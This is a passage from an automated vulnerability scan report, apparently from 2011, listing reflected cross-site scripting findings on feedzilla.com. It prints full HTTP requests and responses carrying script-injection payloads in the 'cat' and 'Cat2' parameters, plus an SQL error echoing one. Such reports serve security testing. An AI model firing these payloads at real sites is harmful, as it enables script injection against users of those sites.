SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd<script>
...[SNIP]...

1.706. http://www.feedzilla.com/rss/flash_feed.asp [Cat2 parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedzilla.com
Path:   /rss/flash_feed.asp

Issue detail

The value of the Cat2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c5e4"><script>alert(1)</script>e49c418b94f was submitted in the Cat2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rss/flash_feed.asp?cat=business&Cat2=mortgage2c5e4"><script>alert(1)</script>e49c418b94f HTTP/1.1
Host: www.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:02:42 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Location: http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352

<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET">
...[SNIP]...

1.707. http://www.feedzilla.com/rss/flash_feed.asp [cat parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedzilla.com
Path:   /rss/flash_feed.asp

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4df"><script>alert(1)</script>de2ee12f61a was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rss/flash_feed.asp?cat=business3b4df"><script>alert(1)</script>de2ee12f61a&Cat2=mortgage HTTP/1.1
Host: www.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:02:41 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Location: http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352

<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET">
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:38:13 CST 2011.